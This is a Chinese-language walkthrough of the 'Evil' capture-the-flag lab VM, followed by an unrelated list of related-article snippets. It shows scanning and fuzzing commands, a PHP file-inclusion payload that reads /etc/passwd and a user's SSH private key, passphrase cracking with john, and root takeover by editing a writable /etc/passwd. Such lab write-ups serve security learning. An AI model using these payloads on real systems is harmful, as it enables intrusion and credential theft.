Evil靶场

Evil

1.主机发现

  • 使用命令探测存活主机,80.139是kali的地址,所以靶机地址就是80.134
fping -gaq 192.168.80.0/24

在这里插入图片描述

2.端口扫描

  • 开放80,22端口
nmap -Pn -sV -p- -A 192.168.80.134

在这里插入图片描述

3.信息收集

  • 访问web界面

    在这里插入图片描述

  • 路径扫描

    gobuster dir -u http://192.168.80.134 -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
    

    在这里插入图片描述

  • 访问robots.txt

    在这里插入图片描述

  • 访问/secret ,发现是空页面

    在这里插入图片描述

  • 继续对/secret进行路径扫描

    gobuster dir -u http://192.168.80.134/secret -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp 
    

    在这里插入图片描述

  • 访问/evil.php,依然返回空页面

    在这里插入图片描述

  • 尝试对/evil.php的参数进行爆破,并没有探测出参数信息

    ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:KEY -w value.txt:VAL -u http://192.168.80.134/secret/evil.php?KEY=VAL -fs 0
    

    在这里插入图片描述

    在这里插入图片描述

  • 尝试/evil.php是否存在文件包含,目前已知根目录下的robots.txt文件是真实存在的,所以尝试对其再次进行文件包含探测;发现一个command参数

    ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:DIR -u http://192.168.80.134/secret/evil.php?DIR=../robots.txt -fs 0
    

    在这里插入图片描述

  • 验证command参数是否真正存在文件包含

    在这里插入图片描述

4.利用文件包含漏洞

  • 读取/etc/passwd文件

    在这里插入图片描述

  • 使用PHP协议封装读取evil.php源文件

    /secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php
    

    在这里插入图片描述

  • 对获得的字符串进行base64解码

    在这里插入图片描述

    <?php
        $filename = $_GET['command'];
        include($filename);
    ?>
    
  • 尝试写入文件,内容为123的base64编码后的字符串

    /secret/evil.php?command=php://filter/write=convert.base64-decode/resource=glc.php&txt=MTIz
    

    在这里插入图片描述

  • 尝试访问刚才写入的文件,发现没有给文件,证明写入失败

    在这里插入图片描述

5.尝试ssh登录

  • 刚才我们发现没有文件写入权限,那我们就换个思路,还记得我们当时读取的/etc/passwd文件吗,自己研究一下发现了一个mowree用户,尝试对其进行ssh登录

    在这里插入图片描述

  • 我们发现mowree用户允许公钥和密码登录两种方式

    ssh mowree@192.168.80.134 -v
    

    在这里插入图片描述

  • 那我们可以利用文件包含漏洞去读取mowree用户的公私钥文件

    • 公钥文件,发现是rsa加密的

      /secret/evil.php?command=../../../../../../home/mowree/.ssh/authorized_keys
      

      在这里插入图片描述

    • 私钥文件

      /secret/evil.php?command=../../../../../../home/mowree/.ssh/id_rsa
      

      在这里插入图片描述

  • 查看网站源码,将私钥文件的内容复制到本地,并给文件赋予权限,尝试ssh登录,发现需要passphrase(ssh-key 的密语字符串)

    在这里插入图片描述

  • 对passphrase进行爆破

    • 将id_rsa文件转换为john命令能够识别的文件

      ./ssh2john.py ~/id_rsa > ~/glc
      

      在这里插入图片描述

    • 使用john进行爆破,爆破成功,密码为unicorn

      john glc --wordlist=/usr/share/wordlists/rockyou.txt 
      

      在这里插入图片描述

6.获得shell

  • ssh登录mowree用户

    在这里插入图片描述

  • 拿到第一个flag

    在这里插入图片描述

7.提权

  • 查看内核版本和发行版本

    在这里插入图片描述

  • 内核版本4.19.0-17;发行版本 Debian10

  • 使用msf提权发现都提权失败了,有兴趣的可以自己试一下

  • 换个思路,查看存在写权限的文件

    find / -writable 2>/dev/null | grep -v proc
    

    在这里插入图片描述

  • 发现对/etc/passwd文件具有写权限,那么问题就变得简单了,直接修改文件中root账号的密码就可以啦

  • 生成一个加密密码,密码为root

    openssl passwd -1
    

    在这里插入图片描述

    在这里插入图片描述

  • 尝试用修改的密码登录root账号,成功提权,获得第二个flag

    在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/151956.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

FDTD自定义材料

官方原文档链接 该文档内容摘自原文档及相关链接 从txt导入材料数据 各项同性材料的3Dmaterials数据 txt文件中应包含以下三列。第一列为波长或频率&#xff1b;第二列为折射率或介电常数实部&#xff1b;第三列为折射率或介电常数虚部。 420 5.08894 0.237724 440 4.78…

基于 HTTP Digest 与 CURL 以及 Requests 的兼容性问题:解决方案与推测原因

在使用Python库requests进行HTTP Digest认证时&#xff0c;我遇到了一个问题。当我使用requests.get()函数时&#xff0c;返回了401 Unauthorized错误&#xff0c;但是当我使用cURL命令时&#xff0c;认证成功。 解决方案&#xff1a; 确认使用的requests版本&#xff1a;我首…

《QT从基础到进阶·三十一》事件循环QCoreApplication,QGuiApplication,QApplication

QCoreApplication&#xff1a;为非界面类项目提供一个事件监听循环。 QGuiApplication&#xff1a;以QtGui模块基础开发的界面项目需要应用环境。 QApplication&#xff1a;以QWidget模块基础开发的界面项目需要应用环境。 可以简单总结为&#xff0c;如果是非界面项目开发&am…

基于单片机的指纹密码锁(论文+源码)

1.系统设计 基于单片机的指纹锁控制系统设计的整体框图如图2.1所示&#xff0c;主控制模块选用单片机STC89C52单片机&#xff0c;同时还包括AT24C02存储电路&#xff0c;指纹模块&#xff0c;LCD12864液晶&#xff0c;继电器&#xff0c;矩阵键盘等硬件电路。其中指纹模块和矩…

Java面试题(每天10题)-------连载(32)

目录 设计模式篇 1、工厂方法模式&#xff08;利用创建同一接口的不同实例&#xff09;&#xff1a; 2、抽象工厂模式&#xff08;多个工厂&#xff09; 3、单例模式&#xff08;保证对象只有一个实例&#xff09; 4、原型模式&#xff08;对一个原型进行复制、克隆产生类…

强国有我助力苔花绽放 | 爱心捐赠仪式在西安顺利举办

2023年11月2日&#xff0c;由中国儿童中心、全国少年儿童“双有”主题教育活动组委会、中华少年儿童慈善救助基金会强国有我项目主办&#xff0c;陕西省青少年宫协会、陕西省妇女儿童活动中心、陕西回归儿童救助中心承办的“苔花绽放”事实无人抚养儿童关爱计划捐赠仪式在陕西回…

企业商标信息查询API的优势和应用实例分析

前言 企业商标是企业在市场中的重要标识和竞争力的体现&#xff0c;而商标信息查询API则成为了企业品牌管理的重要工具。那么&#xff0c;这篇文章将详细阐述企业商标信息查询API的优势和应用实例分析。 企业商标信息API的优势 企业商标信息查询API的优势在于它可以快速、准…

头部厂商Q3交付量环比下滑!激光雷达,现实很骨感

由于中国自主品牌车企在高阶智驾赛道上的激进策略&#xff0c;全球激光雷达行业的走势&#xff0c;也无疑受到中国市场的影响。 本周&#xff0c;禾赛科技发布2023年度三季报&#xff0c;季度激光雷达交付量为47,440台&#xff0c;同比增长125.5%&#xff0c;其中ADAS激光雷达交…

【Vue-Demo】倒计时3秒后返回首页

首页path:/ 倒计时结束后要清除计时器&#xff0c;防止内存泄漏&#xff1a; if (this.count 0) {clearInterval(this.timer); }<!-- ErrorJump.vue --> <template><h2>Error&#xff1a;找不到页面&#xff01;</h2><h4>{{ count }}S后<R…

人均年薪70万!华为项目经理具备了哪些能力

大家好&#xff0c;我是老原。 最近在逛脉脉的时候&#xff0c;看到了一位华为项目经理晒出的月收入&#xff1a;5W&#xff0c;这还是不包含每年分红奖励前的到手薪资。 按他现在的19级别&#xff0c;再加上分红奖励&#xff0c;年薪至少在70W&#xff0c;留言区羡慕声一片。…

中国首幅1米分辨率土地覆盖图

SinoLC-1&#xff1a;中国1米分辨率土地覆盖图为首个具有中国国家尺度覆盖&#xff0c;空间分辨率1米的土地覆盖专题图。针对大范围高分辨率土地覆盖制图中地物复杂多样、高精度训练样本缺乏、制图方法区域迁移性要求高等关键难题&#xff0c;中国地质大学&#xff08;武汉&…

051-第三代软件开发-日志容量时间限制

第三代软件开发-日志容量时间限制 文章目录 第三代软件开发-日志容量时间限制项目介绍日志容量时间限制 关键字&#xff1a; Qt、 Qml、 Time、 容量、 大小 项目介绍 欢迎来到我们的 QML & C 项目&#xff01;这个项目结合了 QML&#xff08;Qt Meta-Object Language…

VUE基础的一些实战总结

目录 创建一个 Vue 应用 步骤 1&#xff1a;安装 Node.js 和 npm 步骤 2&#xff1a;安装 Vue CLI 步骤 3&#xff1a;创建 Vue 项目 步骤 4&#xff1a;启动开发服务器 步骤 5&#xff1a;访问应用程序 步骤 6&#xff1a;编辑 Vue 应用 步骤 7&#xff1a;构建和部署…

接口测试没有接口文档怎么办,如何根据接口文档写接口开发

在进行接口测试之前&#xff0c;一般开发会提供接口文档&#xff0c;提供一些接口参数和必要的熟悉&#xff0c;方便我们编写接口脚本。 但是&#xff0c;如果没有提供接口开发文档&#xff0c;该如何编写接口测试脚本呢&#xff1f; 编写测试脚本之前需要做什么准备&#xff1…

TS-08-A-2D、TS-08-B-1H插装式电磁比例溢流阀放大器

TS-08-A-2D、TS-08-B-1H插装式电磁比例溢流阀放大器持续的电磁铁、高效能的电磁铁结构、可选的线圈电压和终端、工业化通用插孔、紧凑的结构。 螺纹插装式、先导滑阀式减压溢流阀&#xff0c;利用可变电流输入可实现指定范围内的输出压力连续调节。输出压力与 DC 电流输入成比…

.NetCore手写一个 API 限流组件

首先如果APP 拥有游客模式&#xff0c;用户模式以及其他特殊权限。那就意味着需要 IP 限流、用户限流以及特殊权限的情况。 那我们直接实操一下&#xff0c;以 IP 限流作为参考案例&#xff0c;当然要以组件的形式编写&#xff0c;支持扩展。 首先我们创建一个抽象类接口&…

QGIS之二十三矢量线融合

效果 步骤 1、准备数据 现有线分段太多&#xff0c;需要将部分线按照某个字段融合起来 2、融合 运行 3、结果 线已经融合了 线相交处也添加了线的节点

OceanBase杨冰:完全自研,才能逢山开路遇水搭桥

11月16日&#xff0c;在OceanBase2023年度发布会上&#xff0c;OceanBase CEO杨冰介绍&#xff0c;中国数字经济的蓬勃发展催生了对分布式数据库的强大需求&#xff0c;这种需求也牵引了OceanBase坚定投入自主研发&#xff0c;从而推动树立了分布式数据库的四项新标准。 据了解…

学生用什么光的灯最好?适合学生光源的护眼台灯推荐

学生当然用全光谱的台灯最好。全光谱台灯主要还是以护眼台灯为主&#xff0c;因为不仅色谱丰富&#xff0c;贴近自然色的全光谱色彩&#xff0c;通常显色指数都能达到Ra95以上&#xff0c;显色能力特别强&#xff0c;而且还具有其他防辐射危害、提高光线舒适度的特性&#xff0…

YB2502单片集成带可设定输出电流开关型降压转换器

描述&#xff1a; YB2502单片集成带可设定输出电 流开关型降压转换器&#xff0c;可在宽输入电压范围提供1.2安培的持续输出电流&#xff0c;具有优良的负载和线性调整度。最大输出电流可通过外接高精度取样电阻来设定。安全保护机制包括每周期的峰值限流、内部软启动和温度保护…